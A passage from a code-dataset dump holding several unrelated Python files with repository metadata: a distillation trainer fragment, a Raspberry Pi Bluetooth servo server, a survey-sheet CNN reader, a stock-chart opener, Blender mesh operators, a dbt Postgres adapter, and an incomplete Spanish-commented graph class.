print(\"Layer counter graph created.\")\n print(\"Now training with heuristic combination...\")\n\n student_init_chk_path = \"../../../NeuralNetwork/resnet56_initialized_\" + str(initial_epochs) + \"_epochs.ckpt\"\n if path.exists(student_init_chk_path):\n student_model.load_state_dict(torch.load(student_init_chk_path))\n else:\n print(\"Initial student weights file not found.\")\n exit()\n\n history = [evaluate(student_model, test_dl)]\n history += train_model_with_distillation(best.get_heuristic_combination(), heuristicToLayerDict, epochs, initial_epochs, total_epochs,\n best.get_batches(), numOfBatchesToDistill,\n train_dl,\n test_dl, student_model, student_model_number, teacher_model,\n teacher_model_number,\n device, optimizer, max_lr,\n weight_decay, scheduler, kd_loss_type, distill_optimizer,\n distill_lr, grad_clip)\n\n plot_acc(history)\n plot_loss(history)\n\n return best\n","repo_name":"byrongt12/evolutionary_knowledge_distillation","sub_path":"GeneticAlgorithm/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":25302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36839925208","text":"#!/usr/bin/python\n\nimport bluetooth\nimport RPi.GPIO as GPIO\nimport time\nimport sys\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(33, GPIO.OUT)\n\npwm = GPIO.PWM(33, 50)\npwm.start(2.5) # min 2.5, max 11.5 180 degrees\n\nhost = \"\"\n# Creaitng Socket Bluetooth RFCOMM communication\nserver = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\nprint('Bluetooth Socket Created')\ntry:\n\tserver.bind((host, bluetooth.PORT_ANY))\n\tprint(\"Bluetooth Binding Completed\")\nexcept:\n\tprint(\"Bluetooth Binding Failed\")\n\nserver.listen(1) # One connection at a time\nport = server.getsockname()[1]\n\nuuid = \"94f39d29-7d6d-437d-973b-fba39e49d4ee\"\n\nbluetooth.advertise_service(server, \"SampleServer\", service_id=uuid,\n service_classes=[uuid, bluetooth.SERIAL_PORT_CLASS],\n profiles=[bluetooth.SERIAL_PORT_PROFILE],\n # protocols=[bluetooth.OBEX_UUID]\n )\n\nprint(\"Waiting for connection on RFCOMM channel\", port)\n# Server accepts the clients request and assigns a mac address. \nclient, address = server.accept()\nprint(\"Connected To\", address)\nprint(\"Client:\", client)\ntry:\n\twhile True:\n\t\t# Receivng the data. \n\t\tdata = client.recv(1024) # 1024 is the buffer size.\n\t\t# print(data)\n\t\t\n\t\tif data == \"stop\":\n\t\t\tpwm.start(0)\n\t\t\tsend_data = \"Stop \"\n\t\telif data == \"middle\":\n\t\t\tpwm.ChangeDutyCycle(7.0)\n\t\t\tsend_data = \"Middle \"\n\t\telif data == \"right\":\n\t\t\tpwm.ChangeDutyCycle(2.5)\n\t\t\tsend_data = \"Right \"\n\t\telif data == \"left\":\n\t\t\tpwm.ChangeDutyCycle(11.5)\n\t\t\tsend_data = \"Left \"\n\t\telse:\n\t\t\tsend_data = \"Error \"\n\t\t# Sending the data.\n\t\tclient.send(send_data) \nexcept:\n\t# Closing the client and server connection\n\tclient.close()\n\tserver.close()\n","repo_name":"chenphilip888/rpi3b-bluetooth","sub_path":"rfcomm_server_servo.py","file_name":"rfcomm_server_servo.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10470947231","text":"import numpy as np\nimport cv2 as cv, os\nfrom service.text_localization import text_localization\nfrom keras.models import load_model\nimport pandas as pd\n\n# import matplotlib.pyplot as plt\n# from keras.preprocessing import image\n\nanswer = [[],[],[],[],[]]\n\nmydict = {'1':0, '2':0, '3':0, '4':0, '5':0}\n\ndef deep_machine(img) :\n model1 = load_model('./service/DL/model/CNN_colab_m1.h5')\n model2 = load_model('./service/DL/model/CNN_colab_m2.h5')\n model3 = load_model('./service/DL/model/CNN_colab_m3.h5')\n model4 = load_model('./service/DL/model/CNN_colab_m4.h5')\n model5 = load_model('./service/DL/model/CNN_colab_m5.h5')\n \n img = cv.imread(img,0)\n\n resimg = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\n # ======================================================\n ret, thr = cv.threshold(img, 127, 255, cv.THRESH_BINARY)\n\n start_box, end_box = text_localization(thr)\n\n box_list = []\n\n count = 1\n q_num = 1\n check = 0\n # answer = [[0 for j in range(1)] for i in range(5)]\n \n for i in range(len(start_box)):\n if len(start_box) != 26 :\n break\n\n if count % 6 == 4 : #1번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model1.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 1'\n check = 1\n \n else :\n color = (255, 0, 0)\n prediction = 'non 1'\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 5 : #2번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n\n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model2.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 2\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 0 : #3번 체크\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model3.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 3\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 1 : #4번 체크\n if i == 0 :\n count = count + 1\n continue\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model4.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 4\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n \n count = count + 1\n \n elif count % 6 == 2 : #5번 체크\n if i == 1:\n count = count + 1\n continue\n save_img = img[start_box[i][0]:end_box[i][0], start_box[i][1]:end_box[i][1]].copy()\n save_img = cv.resize(save_img, (64, 64), interpolation=cv.INTER_CUBIC)\n save_img = cv.cvtColor(save_img, cv.COLOR_GRAY2BGR)\n \n cols, rows = save_img.shape[:2]\n M = cv.getRotationMatrix2D((cols/2, rows/2), 180, 1)\n save_img = cv.warpAffine(save_img, M, (cols, rows))\n \n save_img = save_img.reshape(-1, 64, 64, 3)\n save_img = save_img.astype('float32')/ 255\n\n yhat = model5.predict(save_img)\n \n if yhat[0][0] >= 0.5:\n color = (0, 0, 255)\n prediction = 'check 2'\n check = 5\n \n else :\n color = (255, 0, 0)\n prediction = 'non 2'\n \n\n \n cv.rectangle(resimg, \n (start_box[i][1], start_box[i][0]), \n (end_box[i][1], end_box[i][0]), \n color)\n\n answer[q_num].append(check)\n\n q_num = q_num + 1\n check = 0\n count = count + 1\n \n elif count % 6 == 3 : #번호\n count = count + 1\n \n cols, rows = resimg.shape[:2]\n\n M = cv.getRotationMatrix2D((rows/2, cols/2), 180, 1)\n resimg = cv.warpAffine(resimg, M, (rows, cols))\n\n # cv.imwrite('./text_local_' + str(img) + '.png', resimg)\n cv.waitKey(0)\n cv.destroyAllWindows()\n\n return answer\n\n\npath_dir = './service/static/upload'\ndef dl_folder():\n answer = [[],[],[],[],[]]\n file_list = os.listdir(path_dir)\n filecount =0\n for f in file_list:\n\n filecount +=1\n temp = deep_machine(path_dir+'/'+f)\n \n answer = answer + temp\n resultNumber = temp\n myarr = countSurveyNumber(resultNumber)\n # answer +=deep_machine(path_dir+'/'+f)\n # resultNumber = deep_machine(path_dir+'/'+f)\n # countSurveyNumber(resultNumber)\n\n #개별 응답 결과\n\n sur = []\n for count in range(0, filecount):\n line = []\n for i in range(6, 10):\n line.append(answer[i][count])\n sur.append(line)\n\n #문항별 응답 결과\n question1 = answer.__getitem__(6)\n question2 = answer[7]\n question3 = answer[8]\n question4 = answer[9]\n\n def add(questionNum):\n number1 = 0\n number2 = 0\n number3 = 0\n number4 = 0\n number5 = 0\n for i in questionNum:\n if i == 1:\n number1 += 1\n if i == 2:\n number2 += 1\n if i == 3:\n number3 += 1\n if i == 4:\n number4 += 1\n if i == 5:\n number5 += 1\n surveyResult = []\n surveyResult.append(number1)\n surveyResult.append(number2)\n surveyResult.append(number3)\n surveyResult.append(number4)\n surveyResult.append(number5)\n return surveyResult\n\n\n sResult1= add(question1)\n sResult2= add(question2)\n sResult3 = add(question3)\n sResult4 = add(question4)\n\n sResult = []\n sResult.append(sResult1) #1번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult2) #2번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult3) #3번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sResult4) #4번문항에 체크된 보기 1,2,3,4의 결과 배열\n sResult.append(sur) #시험지 사진 당 각 문항 체크 보기 번호 배열\n\n # 엑셀 저장_개별 응답결과\n yResult = []\n yResult.append(sur[0:1])\n yResult.append(sur[1:2])\n yResult.append(sur[2:3])\n yResult.append(sur[3:4])\n yResult.append(sur[4:5])\n\n data2 = pd.DataFrame(yResult)\n data2 = data2.rename(index={0: \"응답자 1\"})\n data2 = data2.rename(index={1: \"응답자 2\"})\n data2 = data2.rename(index={2: \"응답자 3\"})\n data2 = data2.rename(index={3: \"응답자 4\"})\n data2 = data2.rename(index={4: \"응답자 5\"})\n data2.columns = ['1~4번 응답결과']\n data2.head();\n data2.to_csv('개별 응답결과.csv', encoding='cp949')\n\n\n\n return sResult, myarr\n #return answer\n\n\n# deep_machine('./doc/img1.jpg')\n\n# dictionary 1번~5번까지 총 합 저장.\ndef countSurveyNumber(checkedNumber):\n arr = [0,0,0,0,0]\n if not checkedNumber :\n print('checkedNumber is null')\n\n if checkedNumber:\n for numbers in checkedNumber:\n if numbers:\n # item = str(number[0])\n # temp = mydict.get(item)\n # temp+=1\n # mydict[item] = temp\n for item in numbers:\n if item == 1:\n arr[0]+=1\n \n elif item ==2:\n arr[1]+=1\n \n elif item ==3:\n arr[2] +=1\n \n elif item ==4:\n arr[3] +=1\n \n elif item ==5:\n arr[4] +=1\n\n return arr\n","repo_name":"5Hanui/LookIt-Web","sub_path":"service/DL/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"38660877663","text":"import webbrowser as browser\nfrom get_symbols import getRobinhoodSymbols\n\ndef main():\n my_stocks = getRobinhoodSymbols()\n for ticker in my_stocks:\n browser.open('https://finance.yahoo.com/chart/' + ticker)\n\nif __name__ == '__main__':\n main()","repo_name":"plsloan/Stock_Analysis","sub_path":"open_robinhood_stocks.py","file_name":"open_robinhood_stocks.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23996514787","text":"# 3Dビュー > メッシュ編集モード > 「X」キー\n\nimport bpy\nimport bmesh\n\n################\n# オペレーター #\n################\n\nclass DeleteBySelectMode(bpy.types.Operator):\n\tbl_idname = \"mesh.delete_by_select_mode\"\n\tbl_label = \"Delete the selection mode and the same element\"\n\tbl_description = \"Same mesh selection mode of the current element (vertices, sides and faces) remove\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\t\n\tdef execute(self, context):\n\t\tmode = context.tool_settings.mesh_select_mode[:]\n\t\tif (mode[0]):\n\t\t\tbpy.ops.mesh.delete(type=\"VERT\")\n\t\telif (mode[1]):\n\t\t\tbpy.ops.mesh.delete(type=\"EDGE\")\n\t\telif (mode[2]):\n\t\t\tbpy.ops.mesh.delete(type=\"FACE\")\n\t\treturn {'FINISHED'}\n\nclass DeleteHideMesh(bpy.types.Operator):\n\tbl_idname = \"mesh.delete_hide_mesh\"\n\tbl_label = \"Remove the covering\"\n\tbl_description = \"Delete all are mesh\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\t\n\tdef execute(self, context):\n\t\tobj = context.active_object\n\t\tif (obj.type != 'MESH'):\n\t\t\tself.report(type={\"ERROR\"}, message=\"Mesh objects are not\")\n\t\t\treturn {\"CANCELLED\"}\n\t\tme = obj.data\n\t\tbm = bmesh.from_edit_mesh(me)\n\t\tfor face in bm.faces[:]:\n\t\t\tif (face.hide):\n\t\t\t\tbm.faces.remove(face)\n\t\tfor edge in bm.edges[:]:\n\t\t\tif (edge.hide):\n\t\t\t\tbm.edges.remove(edge)\n\t\tfor vert in bm.verts[:]:\n\t\t\tif (vert.hide):\n\t\t\t\tbm.verts.remove(vert)\n\t\tbmesh.update_edit_mesh(me)\n\t\treturn {'FINISHED'}\n\n################\n\n\n# menu\ndef menu(self, context):\n\n\tself.layout.separator()\n\tself.layout.operator(DeleteBySelectMode.bl_idname, icon=\"PLUGIN\")\n\tself.layout.operator(DeleteHideMesh.bl_idname, icon=\"PLUGIN\")\n\tself.layout.operator('mesh.dissolve_mode')\n","repo_name":"JT-a/blenderpython279","sub_path":"scripts/addons_extern/AF_3dview_menus/VIEW3D_MT_edit_mesh_delete.py","file_name":"VIEW3D_MT_edit_mesh_delete.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"9304657385","text":"import psycopg2\n\nfrom contextlib import contextmanager\n\nimport dbt.adapters.default\nimport dbt.compat\nimport dbt.exceptions\nimport agate\n\nfrom dbt.logger import GLOBAL_LOGGER as logger\n\n\nGET_RELATIONS_OPERATION_NAME = 'get_relations_data'\n\n\nclass PostgresAdapter(dbt.adapters.default.DefaultAdapter):\n\n DEFAULT_TCP_KEEPALIVE = 0 # 0 means to use the default value\n\n @contextmanager\n def exception_handler(self, sql, model_name=None, connection_name=None):\n try:\n yield\n\n except psycopg2.DatabaseError as e:\n logger.debug('Postgres error: {}'.format(str(e)))\n\n try:\n # attempt to release the connection\n self.release_connection(connection_name)\n except psycopg2.Error:\n logger.debug(\"Failed to release connection!\")\n pass\n\n raise dbt.exceptions.DatabaseException(\n dbt.compat.to_string(e).strip())\n\n except Exception as e:\n logger.debug(\"Error running SQL: %s\", sql)\n logger.debug(\"Rolling back transaction.\")\n self.release_connection(connection_name)\n raise dbt.exceptions.RuntimeException(e)\n\n @classmethod\n def type(cls):\n return 'postgres'\n\n @classmethod\n def date_function(cls):\n return 'datenow()'\n\n @classmethod\n def get_status(cls, cursor):\n return cursor.statusmessage\n\n @classmethod\n def get_credentials(cls, credentials):\n return credentials\n\n @classmethod\n def open_connection(cls, connection):\n if connection.state == 'open':\n logger.debug('Connection is already open, skipping open.')\n return connection\n\n base_credentials = connection.credentials\n credentials = cls.get_credentials(connection.credentials.incorporate())\n kwargs = {}\n keepalives_idle = credentials.get('keepalives_idle',\n cls.DEFAULT_TCP_KEEPALIVE)\n # we don't want to pass 0 along to connect() as postgres will try to\n # call an invalid setsockopt() call (contrary to the docs).\n if keepalives_idle:\n kwargs['keepalives_idle'] = keepalives_idle\n\n try:\n handle = psycopg2.connect(\n dbname=credentials.dbname,\n user=credentials.user,\n host=credentials.host,\n password=credentials.password,\n port=credentials.port,\n connect_timeout=10,\n **kwargs)\n\n connection.handle = handle\n connection.state = 'open'\n except psycopg2.Error as e:\n logger.debug(\"Got an error when attempting to open a postgres \"\n \"connection: '{}'\"\n .format(e))\n\n connection.handle = None\n connection.state = 'fail'\n\n raise dbt.exceptions.FailedToConnectException(str(e))\n\n return connection\n\n def cancel_connection(self, connection):\n connection_name = connection.name\n pid = connection.handle.get_backend_pid()\n\n sql = \"select pg_terminate_backend({})\".format(pid)\n\n logger.debug(\"Cancelling query '{}' ({})\".format(connection_name, pid))\n\n _, cursor = self.add_query(sql, 'master')\n res = cursor.fetchone()\n\n logger.debug(\"Cancel query '{}': {}\".format(connection_name, res))\n\n # DATABASE INSPECTION FUNCTIONS\n # These require the profile AND project, as they need to know\n # database-specific configs at the project level.\n def alter_column_type(self, schema, table, column_name,\n new_column_type, model_name=None):\n \"\"\"\n 1. Create a new column (w/ temp name and correct type)\n 2. Copy data over to it\n 3. Drop the existing column (cascade!)\n 4. Rename the new column to existing column\n \"\"\"\n\n relation = self.Relation.create(\n schema=schema,\n identifier=table,\n quote_policy=self.config.quoting\n )\n\n opts = {\n \"relation\": relation,\n \"old_column\": column_name,\n \"tmp_column\": \"{}__dbt_alter\".format(column_name),\n \"dtype\": new_column_type\n }\n\n sql = \"\"\"\n alter table {relation} add column \"{tmp_column}\" {dtype};\n update {relation} set \"{tmp_column}\" = \"{old_column}\";\n alter table {relation} drop column \"{old_column}\" cascade;\n alter table {relation} rename column \"{tmp_column}\" to \"{old_column}\";\n \"\"\".format(**opts).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name)\n\n return connection, cursor\n\n def _link_cached_relations(self, manifest, schemas):\n try:\n table = self.run_operation(manifest, GET_RELATIONS_OPERATION_NAME)\n finally:\n self.release_connection(GET_RELATIONS_OPERATION_NAME)\n table = self._relations_filter_table(table, schemas)\n\n for (refed_schema, refed_name, dep_schema, dep_name) in table:\n referenced = self.Relation.create(schema=refed_schema,\n identifier=refed_name)\n dependent = self.Relation.create(schema=dep_schema,\n identifier=dep_name)\n self.cache.add_link(dependent, referenced)\n\n def _list_relations(self, schema, model_name=None):\n sql = \"\"\"\n select tablename as name, schemaname as schema, 'table' as type from pg_tables\n where schemaname ilike '{schema}'\n union all\n select viewname as name, schemaname as schema, 'view' as type from pg_views\n where schemaname ilike '{schema}'\n \"\"\".format(schema=schema).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name, auto_begin=False)\n\n results = cursor.fetchall()\n\n return [self.Relation.create(\n database=self.config.credentials.dbname,\n schema=_schema,\n identifier=name,\n quote_policy={\n 'schema': True,\n 'identifier': True\n },\n type=type)\n for (name, _schema, type) in results]\n\n def get_existing_schemas(self, model_name=None):\n sql = \"select distinct nspname from pg_namespace\"\n\n connection, cursor = self.add_query(sql, model_name, auto_begin=False)\n results = cursor.fetchall()\n\n return [row[0] for row in results]\n\n def check_schema_exists(self, schema, model_name=None):\n sql = \"\"\"\n select count(*) from pg_namespace where nspname = '{schema}'\n \"\"\".format(schema=schema).strip() # noqa\n\n connection, cursor = self.add_query(sql, model_name,\n auto_begin=False)\n results = cursor.fetchone()\n\n return results[0] > 0\n\n @classmethod\n def convert_text_type(cls, agate_table, col_idx):\n return \"text\"\n\n @classmethod\n def convert_number_type(cls, agate_table, col_idx):\n decimals = agate_table.aggregate(agate.MaxPrecision(col_idx))\n return \"float8\" if decimals else \"integer\"\n\n @classmethod\n def convert_boolean_type(cls, agate_table, col_idx):\n return \"boolean\"\n\n @classmethod\n def convert_datetime_type(cls, agate_table, col_idx):\n return \"timestamp without time zone\"\n\n @classmethod\n def convert_date_type(cls, agate_table, col_idx):\n return \"date\"\n\n @classmethod\n def convert_time_type(cls, agate_table, col_idx):\n return \"time\"\n","repo_name":"alexpatton/dbt","sub_path":"dbt/adapters/postgres/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"39917570230","text":"\"\"\"\nTaller 2 | Semana 9 | Jesús Alberto Domínguez Charris\n\n- Determinar si existe un camino válido entre dos vértices (línea 287)\n- Determinar si el grafo tiene, al menos un ciclo (línea 320)\n- Determinar si el grafo es fuertemente conexo (línea 344)\n- Determinar si el grafo es completo (línea 360)\n\"\"\"\n\nimport sys\n\nclass Arco:\n def __init__(self, verticeInical, verticeFinal, peso: int) -> None:\n self.verticeInicial = verticeInical\n self.verticeFinal = verticeFinal\n self.peso = peso\n\n def __repr__(self) -> str:\n return f\"[{self.verticeInicial}, {self.verticeFinal}]: {self.peso}\"\n\n def __str__(self) -> str:\n return self.__repr__()\n \n def __eq__(self, otro: object) -> bool:\n if not isinstance(otro, Arco):\n return False\n return self.verticeInicial == otro.verticeInicial and \\\n self.verticeFinal == otro.verticeFinal and \\\n self.peso == otro.peso\n \n def __hash__(self) -> int:\n return hash(str(self))\n\n\nclass ListaAdyacencia:\n def __init__(self) -> None:\n self.__listaVertices = dict()\n\n def __str__(self) -> str:\n return str(self.__listaVertices)\n \n def buscarVertice(self, datoBuscar):\n return self.__listaVertices.get(datoBuscar)\n\n def adicionarVertice(self, nuevoVertice):\n if self.buscarVertice(nuevoVertice) is None:\n listaAdyacentes = set()\n self.__listaVertices[nuevoVertice] = listaAdyacentes\n\n def verVertices(self):\n return list(self.__listaVertices.keys())\n\n def contarVertices(self):\n return len(self.__listaVertices)\n\n def existenAmbosVertices(self, verticeInicial, verticeFinal):\n buscarIninial = self.buscarVertice(verticeInicial)\n buscarFinal = self.buscarVertice(verticeFinal)\n if buscarIninial is None or buscarFinal is None:\n return False\n else:\n return True\n \n def adicionarArco(self, verticeInicial, verticeFinal, peso: int = 0):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n arco = Arco(verticeInicial, verticeFinal, peso)\n buscarIninial: set = self.buscarVertice(verticeInicial)\n buscarIninial.add(arco)\n \n def buscarArcoConPeso(self, verticeInicial, verticeFinal, peso: int):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n arcoTemporal = Arco(verticeInicial, verticeFinal, peso)\n return arcoTemporal in self.buscarVertice(verticeInicial)\n \n def buscarArcoSinPeso(self, verticeInicial, verticeFinal):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n conjunto: set = self.buscarVertice(verticeInicial)\n arcos: Arco\n for arcos in conjunto:\n if verticeFinal == arcos.verticeFinal:\n return True\n \n def eliminarArco(self, verticeInicial, verticeFinal, peso: int):\n if not self.buscarArcoConPeso(verticeInicial, verticeFinal, peso):\n return None\n arcoTemporal = Arco(verticeInicial, verticeFinal, peso)\n conjunto: set = self.__listaVertices[verticeInicial]\n conjunto.remove(arcoTemporal)\n return True\n \n def eliminarVertice(self, verticeEliminar):\n listaTemporal = []\n for vertices in self.verVertices():\n arco: Arco\n conjunto: set = self.__listaVertices[vertices]\n for arco in conjunto:\n if arco.verticeFinal == verticeEliminar:\n listaTemporal.append(arco)\n arco: Arco\n for arco in listaTemporal:\n verticeInicial = arco.verticeInicial\n verticeFinal = arco.verticeFinal\n peso = arco.peso\n self.eliminarArco(verticeInicial, verticeFinal, peso)\n self.__listaVertices.pop(verticeEliminar)\n return True\n \n def listaArcos(self):\n listaArcos = []\n for vertices in self.verVertices():\n for arcos in self.buscarVertice(vertices):\n listaArcos.append(arcos)\n return listaArcos\n \n def contarArcos(self):\n return len(self.listaArcos())\n \n def sonAdyacentes(self, verticeInicial, verticeFinal):\n if self.existenAmbosVertices(verticeInicial, verticeFinal):\n return self.buscarArcoSinPeso(verticeInicial, verticeFinal)\n\n def verAdyacentesVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return \"No existe\"\n return self.buscarVertice(verticeBuscar)\n \n def contarAdyacentesVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n return len(self.__listaVertices.get(verticeBuscar))\n \n def verAdyacentesTodos(self):\n cadena = \"\"\n for vertice in self.__listaVertices:\n for elementoConjunto in self.__listaVertices[vertice]:\n cadena = cadena + str(elementoConjunto) + \"%\"\n cadena = cadena.split(\"%\")\n cadena.remove(\"\")\n if len(cadena) == 0:\n return {}\n cadena = set(cadena)\n return cadena\n \n def contarAdyacentesTodos(self):\n cont = 0\n for vertice in self.__listaVertices:\n for _ in self.__listaVertices[vertice]:\n cont = cont + 1\n return cont\n \n def dirigidosConPeso(self, verticeInical, verticeFinal, peso: int):\n if self.buscarArcoConPeso(verticeInical, verticeFinal, peso) and self.buscarArcoConPeso(verticeFinal, verticeInical, peso):\n return True\n \n def dirigidosSinPeso(self, verticeInical, verticeFinal):\n if self.buscarArcoSinPeso(verticeInical, verticeFinal) and self.buscarArcoSinPeso(verticeFinal, verticeInical):\n return True\n \n def noDirigidosConPeso(self, verticeInical, verticeFinal, peso: int):\n if (self.buscarArcoConPeso(verticeInical, verticeFinal, peso) or self.buscarArcoConPeso(verticeFinal, verticeInical, peso)) and \\\n not self.dirigidosConPeso(verticeInical, verticeFinal, peso):\n return True\n \n def noDirigidosSinPeso(self, verticeInical, verticeFinal):\n if (self.buscarArcoSinPeso(verticeInical, verticeFinal) or self.buscarArcoSinPeso(verticeFinal, verticeInical)) and \\\n not self.dirigidosSinPeso(verticeInical, verticeFinal):\n return True\n \n def __dfs(self, listaRecorrido: list, setVisitados: set, verticeActual):\n listaRecorrido.append(verticeActual)\n setVisitados.add(verticeActual)\n arcoActual: Arco\n adyacentes = self.buscarVertice(verticeActual)\n for arcoActual in adyacentes:\n verticeFinal = arcoActual.verticeFinal\n if verticeFinal not in setVisitados:\n listaRecorrido, setVisitados = self.__dfs(listaRecorrido, setVisitados, verticeFinal)\n return listaRecorrido, setVisitados\n \n def recorrerProfundidad(self, verticeInicial): \n if self.buscarVertice(verticeInicial) is None:\n return None \n recorrido, visitados = self.__dfs(list(), set(), verticeInicial)\n for vertice in self.verVertices():\n if vertice not in visitados:\n recorrido, visitados = self.__dfs(recorrido, visitados, vertice)\n return recorrido\n \n def __bfs(self, listaRecorrido: list, setVisitados: set, verticeActual):\n listaRecorrido.append(verticeActual)\n setVisitados.add(verticeActual)\n colaAdyacente = [verticeActual]\n while colaAdyacente:\n arcoActual: Arco\n verticeCola = colaAdyacente.pop(0) \n adyacentesActual = self.buscarVertice(verticeCola)\n for arcoActual in adyacentesActual:\n verticeFinal = arcoActual.verticeFinal\n if verticeFinal not in setVisitados:\n listaRecorrido.append(verticeFinal)\n setVisitados.add(verticeFinal)\n colaAdyacente.append(verticeFinal)\n return listaRecorrido, setVisitados\n \n def recorrerAnchura(self, verticeInicial):\n if self.buscarVertice(verticeInicial) is None:\n return None \n recorrido, visitados = self.__bfs(list(), set(), verticeInicial)\n for vertice in self.verVertices():\n if vertice not in visitados:\n recorrido, visitados = self.__bfs(recorrido, visitados, vertice)\n return recorrido\n\n def gradoSalidaVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n conjunto = self.buscarVertice(verticeBuscar)\n return len(conjunto)\n \n def gradoEntradaVertice(self, verticeBuscar):\n if self.buscarVertice(verticeBuscar) is None:\n return None\n cont = 0\n for vertices in self.verVertices():\n if self.verAdyacentesVertice(vertices) is None:\n continue\n arco: Arco\n for arco in self.verAdyacentesVertice(vertices):\n verticeFinal = arco.verticeFinal\n if verticeBuscar == verticeFinal:\n cont = cont + 1\n return cont\n \n def imprimirDatos(self):\n print(f\"Lista: {self}\")\n print(f\"Contar vértices: {self.contarVertices()}\")\n print(f\"Ver vértices: {self.verVertices()}\")\n print(f\"Contar arcos: {self.contarArcos()}\")\n print(f\"Ver arcos: {self.listaArcos()}\")\n print(f\"Contar adyacentes: {self.contarAdyacentesTodos()}\")\n print(f\"Ver adyacentes: {self.verAdyacentesTodos()}\\n\")\n \n def grafoDirigido(self):\n lista = []\n arco: Arco\n for arco in self.listaArcos():\n q = arco.verticeInicial\n w = arco.verticeFinal\n r = arco.peso\n arcoInvertido = Arco(w, q, r)\n if arcoInvertido not in self.listaArcos():\n return True\n return False\n\n def grafoNoDirigido(self):\n return not self.grafoDirigido()\n \n def __dfsConexo(self, inicio, arcosVisitados=None):\n if arcosVisitados is None:\n arcosVisitados = set()\n visitados = {inicio}\n stack = [inicio]\n while stack:\n vertice = stack.pop()\n vecino: Arco\n for vecino in self.__listaVertices[vertice]:\n if (vertice, vecino) not in arcosVisitados:\n visitados.add(vecino.verticeFinal)\n 